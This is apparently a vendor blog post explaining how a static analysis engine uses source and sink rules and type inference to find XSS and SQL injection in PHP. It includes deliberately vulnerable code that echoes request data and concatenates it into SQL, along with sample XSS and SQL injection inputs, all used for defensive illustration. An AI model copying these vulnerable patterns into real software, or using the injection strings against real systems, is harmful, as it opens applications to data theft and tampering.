This code retrieves untrusted data from the HTTP request, concatenates that input with string literals, and finally echoes the dynamically constructed content out to the HTML page. Writing static code analysis rules for any engine capable of data flow analysis is fairly straightforward… the return value of the _GET field access is a source of untrusted data, and the first argument to the echo function invocation is a sink. Why is this easy to capture? Well… the signatures for the data types represented in the rules are incredibly simple. For example, the signature for the echo method is “echo(object)”, where “echo” is the function name and “(object)” indicates that it accepts one argument whose data type is unknown. We assume all parameter types are the type ‘object’ to keep things simple; we cannot possibly know all parameter types for all function invocations without performing richer analysis.

Static analysis tools all have their own unique way of capturing security rules using a custom language. To keep discussions about static analysis security rules vendor agnostic, we will only be discussing rule writing and rule matching at the code signature level. Let’s agree on the format of [class name]->[function name]([one or more parameters]).
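As an aside, one common mitigation for the snippet above (a sketch, not the only correct fix) is to HTML-encode the untrusted data before it reaches the sink:

```php
<?php
// HTML-encode untrusted request data before echoing it into the page.
// The fallback string here simulates attacker input when no request
// parameter is present (e.g. when run from the command line).
$unsafe_variable = isset($_GET['user_input'])
    ? $_GET['user_input']
    : '<script>alert(1)</script>';

$safe_variable = htmlspecialchars($unsafe_variable, ENT_QUOTES, 'UTF-8');

echo "You searched for:<strong>" . $safe_variable . "</strong>";
```

With the encoding in place, the echo argument is no longer attacker-controlled markup, and a data flow engine that models htmlspecialchars as a sanitizer would not flag this statement.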

Let’s make this a little more interesting. Consider the following PHP code snippet that may or may not be indicative of a SQL Injection vulnerability:



$anonymous = new Anonymous();

$anonymous->runQuery($_GET['name']); // untrusted request data passed straight in


This code instantiates a class called “Anonymous” and invokes the “runQuery” method of that class using untrusted data from the HTTP request. Is this vulnerable to SQL Injection? Well – it depends on what runQuery does. Let’s assume that the Anonymous class is part of a 3rd party library for which we do not have the source, or which we simply do not want to include in the scan. Let’s also assume that we know runQuery dynamically generates and executes SQL queries and is thus considered a sink. Based on these assumptions, a manual code review would clearly indicate that yes, this is vulnerable to SQL Injection. But how would we do this with static analysis? Here’s where it gets tricky…
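To make the assumption about runQuery concrete, here is a hypothetical sketch of what the 3rd party class might look like internally. The class name comes from the example above, but the body is entirely an assumption on our part; we do not have the library's actual source:

```php
<?php
// Hypothetical body for the 3rd party Anonymous class (an assumption,
// since the real source is unavailable). Untrusted data is concatenated
// directly into the SQL string, which is what makes runQuery() a sink.
class Anonymous {
    public function runQuery($name) {
        $sql = "SELECT * FROM users WHERE name = '" . $name . "'";
        // A real library would execute $sql against the database here;
        // this sketch returns it so the injection is easy to see.
        return $sql;
    }
}

$anonymous = new Anonymous();
echo $anonymous->runQuery("x' OR '1'='1");
```

The attacker-supplied quote characters break out of the string literal and rewrite the WHERE clause, which is the classic SQL Injection pattern the sink rule is meant to catch.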

We want to mark the “runQuery” method of the “Anonymous” type as a sink for SQL commands, such that if untrusted data is used as an argument to this method, then we have SQL Injection. The problem is we need to not only capture information about the “runQuery” method in our sink rule, but we must also capture the fact that it is associated with the “Anonymous” class. The code signature that must be reflected in the security rule would look as follows: Anonymous->runQuery(object).

Unfortunately, basic forms of static analysis are unable to determine with reasonable confidence that the $anonymous variable is of type Anonymous – in fact, $anonymous could be of any type! As a result, the underlying engine is never able to match the security rule to the $anonymous->runQuery($_GET['name']) statement, resulting in a missed vulnerability.

How does WhiteHat Sentinel Source’s PHP offering overcome this problem? It’s simple… in theory. When the engine first runs, it builds a model of the source code and attempts to compare the sink rule against the $anonymous->runQuery($_GET['name']) method invocation. At this point, the only information we have about this statement is the method name and number of arguments, producing a code signature as follows: ?->runQuery(object). Compare this signature to the signature represented in our sink rule: Anonymous->runQuery(object). Since we cannot know the type of the $anonymous variable at this point, we perform a partial match such that we only compare the method name and arguments to those captured in the security rule. Since the statement’s signature is a partial match to our rule’s signature, we mark the model as such and move on.

After processing all our security rules, the static code analysis engine will begin performing data flow analysis on top of our patented Runtime Simulation algorithm looking for security vulnerabilities. The engine will first see the expression “$anonymous = new Anonymous();” and actually record the fact that the $anonymous variable, at any point in the future, may be of type “Anonymous”. Next, the engine will hit the following statement “$anonymous->runQuery($_GET['name']);”. This statement was previously marked with a SQL Injection sink via a partial match. We now have more information about the $anonymous variable and now check if it is a full match with the original security rule. The statement’s signature is now known to be: Anonymous->runQuery(object) which fully matches the signature represented by the sink security rule. With a full match realized, the engine treats this statement as a sink and flags the SQL Injection vulnerability correctly!
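The partial-then-full matching idea described above can be sketched in a few lines. The "Class->method(args)" string format and the helper function are illustrative assumptions for this post, not Sentinel Source's actual rule language:

```php
<?php
// Sketch of partial vs. full signature matching. Signatures take the
// form "Class->method(argtype)"; an unknown receiver type is "?".
function matches($stmtSig, $ruleSig) {
    list($stmtClass, $stmtRest) = explode('->', $stmtSig, 2);
    list($ruleClass, $ruleRest) = explode('->', $ruleSig, 2);
    if ($stmtRest !== $ruleRest) {
        return 'none';    // method name or arguments differ
    }
    if ($stmtClass === '?') {
        return 'partial'; // type unknown: remember and revisit later
    }
    return ($stmtClass === $ruleClass) ? 'full' : 'none';
}

$rule = 'Anonymous->runQuery(object)';
echo matches('?->runQuery(object)', $rule), "\n";         // partial
echo matches('Anonymous->runQuery(object)', $rule), "\n"; // full
echo matches('Unrelated->logQuery(object)', $rule), "\n"; // none
```

First pass: the receiver type is unknown, so the statement is only a partial match. Once type inference pins $anonymous to Anonymous, the same comparison upgrades to a full match and the statement is treated as a sink.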

Ok – that was a little too easy. Let’s make this more challenging… consider the following PHP code snippet:


$anonymous = null;

if (funct_a() > funct_b()) {
     $anonymous = new Anonymous();
} elseif (funct_a() == funct_b()) {
     $anonymous = new NotSoAnonymous();
} else {
     $anonymous = new NsaAnonymous();
}

$anonymous->runQuery($_GET['name']);

What the heck does the engine do now when it sees the runQuery statement? The engine will collect all data type assignments for the $anonymous variable and use all such types in an attempt to realize a full matching for the runQuery statement. The engine will see three different possible code signatures for the statement. They are as follows:

Anonymous->runQuery(object)
NotSoAnonymous->runQuery(object)
NsaAnonymous->runQuery(object)

The engine will take these three signatures and compare to the data type found in the signature represented by the partial match security rule. Given that the first of three signatures fully matches the signature represented by the security rule, the engine will treat the statement as a sink and flag the SQL Injection vulnerability correctly!
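Expressed as code (again using the assumed signature format from earlier, not the product's real rule language), the engine's behavior at this statement amounts to: try every candidate receiver type, and flag the statement if any one of them fully matches the sink rule:

```php
<?php
// With several possible receiver types collected from the branches,
// the statement is a sink if ANY candidate signature fully matches.
$ruleSig = 'Anonymous->runQuery(object)';
$candidateTypes = array('Anonymous', 'NotSoAnonymous', 'NsaAnonymous');

$isSink = false;
foreach ($candidateTypes as $type) {
    if ($type . '->runQuery(object)' === $ruleSig) {
        $isSink = true; // one full match is enough
        break;
    }
}

var_dump($isSink); // bool(true)
```

Only the first candidate matches here, but one match is all it takes for the vulnerability to be flagged.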

You may be asking yourself: “what if $anonymous was of type NotSoAnonymous or NsaAnonymous? Would it still flag a vulnerability?” The answer is a resounding yes. Static analysis technologies do not, and in my opinion should not, attempt to evaluate conditionals, as such practice will lead to an overwhelming number of missed vulnerabilities. Static code analysis could support trivial conditionals, such as comparisons of primitives, but conditionals in real-world code require far more guesswork and various forms of heuristics that ultimately lead to poor results. Even so, is it not fair to say that at some point in the application “funct_a()” will be greater than “funct_b()”? Otherwise, what is the point of the conditional in the first place? Our technology assumes all conditionals will be true at some point in time.

Remember when I said this was easy in theory? Well, this is where it starts to get really interesting: Consider the following code snippet and assume we do not have the source code available for “create_class_1()”, “create_class_2()” and “create_class_3()”:


$anonymous = null;

if (funct_a() > funct_b()) {
     $anonymous = create_class_1();
} elseif (funct_a() == funct_b()) {
     $anonymous = create_class_2();
} else {
     $anonymous = create_class_3();
}

$anonymous->runQuery($_GET['name']);

Now what is the range of possible data types for the $anonymous variable when used in the vulnerable statement? This is where we begin to stress the capabilities of the security rule language itself. WhiteHat Sentinel Source solves this by allowing the security rule writer to explicitly define the data type returned from a function invocation if that data type cannot be determined from the provided source code. For example, the security rule writer could capture a rule stating that the return value of the create_class_3() function invocation is of type Anonymous. The engine would then take this information, propagate data types as before, and correctly flag the SQL Injection vulnerability associated with the runQuery method invocation.
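Conceptually, such a rule behaves like a lookup table mapping function names to declared return types; unknown functions fall back to the unknown type "?". The table format and helper below are illustrative assumptions, not Sentinel Source's actual rule syntax:

```php
<?php
// Hypothetical return-type rule table: the rule writer declares return
// types for functions whose source is unavailable, and the engine uses
// these declarations during type propagation.
$returnTypeRules = array(
    'create_class_1' => 'Anonymous',
    'create_class_2' => 'NotSoAnonymous',
    'create_class_3' => 'Anonymous', // the rule from the example above
);

function inferReturnType($functionName, array $rules) {
    // Fall back to the unknown type marker when no rule exists.
    return isset($rules[$functionName]) ? $rules[$functionName] : '?';
}

echo inferReturnType('create_class_3', $returnTypeRules), "\n"; // Anonymous
echo inferReturnType('mystery_func', $returnTypeRules), "\n";   // ?
```

With create_class_3() declared to return Anonymous, the $anonymous variable again picks up the Anonymous type in the else branch, and the runQuery signature fully matches the sink rule as before.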

WhiteHat Sentinel Source’s type inference system allows us to perform more accurate and efficient analysis of source code in dynamically typed languages. Our type inference system not only allows us to more accurately capture security rules, but it also allows us to more accurately model control flow from method invocations of instances to method declarations of class declarations. Such capability is critical for any real world static code analysis of PHP source code.

I hope you enjoyed this rather technical and slightly lengthy blog post. It was a blast building out support for PHP and I look forward to our Sentinel Source customers benefiting from our newly available technology. Until next time…